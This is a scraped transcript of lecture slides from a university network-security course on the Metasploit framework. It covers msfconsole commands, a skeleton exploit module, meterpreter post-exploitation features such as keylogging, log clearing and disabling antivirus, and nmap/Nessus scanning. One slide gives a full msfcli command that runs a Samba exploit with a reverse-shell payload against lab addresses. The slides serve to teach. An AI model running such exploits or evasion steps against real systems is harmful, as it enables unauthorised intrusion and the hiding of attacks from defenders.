Presentation is loading. Please wait.

Presentation is loading. Please wait.

EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.

Published byDina Johns Modified over 9 years ago

Similar presentations

Presentation on theme: "EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or."— Presentation transcript:

1 EECS 354 Network Security Metasploit Features

2 Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or home computer connected to the Internet is a potential victim Exploit trust in third party software Openssl, Apache, IE, VMWare, MySQL, etc Commonly used and trusted by popular applications Run on known port numbers

3 Hacking on the Internet Finding vulnerable targets Most commonly found on search engines (i.e. Google) Crafted searches Embedded devices are also a target “Internet of Things” Home routers are a hot topic

4 Vulnerability Types Arbitrary Code Execution Most serious Essentially exposes a shell to the Internet Privilege Escalation Often leads to root privilege (i.e. total control) Total information leakage, total control of server processes

5 Vulnerability Types Other information leakage Can be serious (i.e. Heartbleed) Source code Sensitive user data Denial of Service Causing an application or server to run slowly Causing a application or server to crash

6 Introduction Metasploit is an automated exploitation framework Open source, continuous development and updates Tools for scanning, exploit development, exploitation, and post-exploitation Extensible through plugins and modules

7 Metasploit Architecture

8 Metasploit Basic Usage Writing a Metasploit Module Metasploit Special Features Scanning Basics

9 Msfconsole Most feature-full interface for Metasploit is msfconsole Like a shell, just for Metasploit In addition to special Metasploit commands, also accepts bash commands ping, ls, curl, etc

10 Common Commands connect like netcat, connects to host on specified port search search module database, by name, platform, app, cve, and more sessions List or manipulate your open sessions (shells, VNC, etc) show Show anything: show modules, exploits, payloads, options (for selected module)

11 Basic Usage Using a module: (Optional) If your module is not loaded, load it with loadpath (Optional) If you don’t know the name, search for it with search Select your module with use Fill parameters using set (show parameters with show options) Run with exploit Reload and run with rexploit

12 Metasploit CLI Sometimes you’d rather not load up the whole console just to run a single script Use msfcli to interact with Metasploit from the command-line

13 Metasploit CLI root@kali:~# msfcli -h Usage: /opt/metasploit/msf3/msfcli [mode] ============================================================= ======= ModeDescription --------------- (A)dvancedShow available advanced options for this module (AC)tions Show available actions for this auxiliary module (C)heck Run the check routine of the selected module (E)xecute Execute the selected module (H)elp You're looking at it baby! (I)DS Evasion Show available ids evasion options for this module (O)ptions Show available options for this module (P)ayloads Show available payloads for this module (S)ummary Show information about this module (T)argets Show available targets for this exploit module

14 Metasploit CLI Example usage: msfcli exploit/multi/samba/usermap_script \ RHOST=172.16.194.172 PAYLOAD=cmd/unix/reverse \ LHOST=172.16.194.163 E : path to ruby script RHOST: remote host PAYLOAD: shellcode for reverse shell LHOST: local host E: execute

15 Metasploit Basic Usage Writing a Metasploit Module Metasploit Special Features Scanning Basics

16 Writing Modules Auxiliary Defines a function called run Can do simple tasks: fuzzing, scanning, sniffing, bruteforcing logins Exploit Defines a function called exploit Requires a payload (shellcode) Most basic form Connect to remote host Send payload Run handler (sets up reverse shell connection) Disconnect

17 Writing Modules require 'msf/core‘ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) # set target and payload characteristics, etc end def exploit connect sock.put(payload.encoded) handler disconnect end

18 Sidenote for Project 4 Project 4 requires writing brute force exploits Metasploit provides the brute mix-in include Exploit::Brute Module overrides the exploit method to call brute_exploit for each step within an address range Start, stop, step, and (optional) delay are defined in target.bruteforce Step of 0 will be automatically resolved to the size of the payload’s nop sled

19 Metasploit Basic Usage Writing a Metasploit Module Metasploit Special Features Scanning Basics

20 Post-Exploitation Tools Most post-exploitation tools rely on a meterpreter shell Meterpreter is a payload that can be selected with many exploits A meterpreter shell provides a consistent cross-platform post-exploitation interface Also acts as an in-memory stager for loading additional exploit code remotely

21 Meterpreter Basics Provides basic UNIX interface: ls, cat, cd, pwd, getuid, ps Also some convenience features search: convenient file system searching migrate: migrate control to another running process clearev: clears logs (Windows only) upload, download webcam_list, webcam_snap

22 More Meterpreter Features Persistent backdoors with metsvc John the Ripper integration Remote packet sniffing Keylogging Kill off antivirus Dump system information Pretty much anything you can think of Or you can write your own scripts, too

23 Metasploit Databases Very powerful db_* commands Databases are often used to store hosts, ports, services, credentials, etc Can be populated directly from scan results db_autopwn –p –e Somewhat controversial command Will attempt to execute all known exploits on all known hosts on the known open and specified ports Very “noisy”

24 Scanner Integration Integration with nmap and Nessus Can select to send scan results directly to database for exploitation Hosts, ports, services, machine info Simple interface using msfconsole nmap or db_nmap load nessus Or, ‘search portscan’ for auxiliary modules

25 Metasploit Basic Usage Writing a Metasploit Module Metasploit Special Features Scanning Basics

26 Nessus State-of-the-art scanning tool Web interface for designing scans Can set ‘policies’ to get quicker scans Or, just scan everything and find all services Associates results with CVE, other references for easy translation to exploitation

27 Nessus

28 Results are listed by priority Low -> Critical Critical vulnerabilities usually can lead to root shell on a remote machine Medium-High may mean lower privilege or limited commands Ex: default credentials for account user:user

29 TCP Scanning TCP SYN scan Most common Never opens a full connection, only sends a single packet Returns port state Open: received SYNACK Filtered: no response (firewalled) Closed: received RST Other TCP scans: FIN, Null, Xmas connect ACK

30 UDP Scanning UDP scans send an arbitrary (or empty) UDP packet, or a crafted packet for specific ports (like DNS) Open/filtered will timeout Closed will send ICMP unreachable These responses are often rate limited, making UDP scans very slow in general

31 OS Detection and more Scanners can use OS fingerprinting to detect an OS based on response characteristics Scanners also attempt service identification Services normally run on specified ports Services can be ‘interrogated’ Sending crafted packets and anticipating particular responses for particular services

Download ppt "EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or."

Similar presentations

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.

Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,

 Dynamic policies o Change as system security state/load changes o GAA architecture  Extended access control lists  Pre-, mid- and post-conditions,
Review For Exam 2 March 9, 2010 MIS 4600 – MBA 5880 - © Abdou Illia.

Review For Exam 2 March 9, 2010 MIS 4600 – MBA © Abdou Illia.
Hands-On Ethical Hacking and Network Defense Second Edition Chapter 5 Port Scanning.

Hands-On Ethical Hacking and Network Defense Second Edition Chapter 5 Port Scanning.
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning.

Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.

CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Scanning.
Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning Last updated 9-18-08.

Hands-On Ethical Hacking and Network Defense Chapter 5 Port Scanning Last updated
Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.

Scanning Determining if the system is alive IP Scanning Port Scanning War Dialing.
Hacking Exposed 7 Network Security Secrets & Solutions Chapter 2 Scanning 1.

Hacking Exposed 7 Network Security Secrets & Solutions Chapter 2 Scanning 1.
Offensive Security Part 1 Basics of Penetration Testing

Offensive Security Part 1 Basics of Penetration Testing
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.

A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
System Security Scanning and Discovery Chapter 14.

System Security Scanning and Discovery Chapter 14.
ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.

ITP 457 Network Security Network Hacking 101. Hacking Methodology (review) 1. Gather target information 2. Identify services and ports open on the target.
Hacking Linux Based on Hacking Linux Exposed Hatch, Lee, and Kurtz ISBN 0-07-212773-2.

Hacking Linux Based on Hacking Linux Exposed Hatch, Lee, and Kurtz ISBN
Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA 15213-3890 Sponsored by.

Intruder Trends Tom Longstaff CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA Sponsored by.
Scanning February 23, 2010 MIS 4600 – MBA 5880 - © Abdou Illia.

Scanning February 23, 2010 MIS 4600 – MBA © Abdou Illia.
Security Tools CS-480b Dick Steflik. CACLS Windows NT, W2000, XP Displays or modifies access control lists (ACLs) of files.

Security Tools CS-480b Dick Steflik. CACLS Windows NT, W2000, XP Displays or modifies access control lists (ACLs) of files.
Computer Security and Penetration Testing

Computer Security and Penetration Testing
1 Presentation ISS Security Scanner & Retina by Adnan Khairi 100183586.

1 Presentation ISS Security Scanner & Retina by Adnan Khairi

Similar presentations

Ads by Google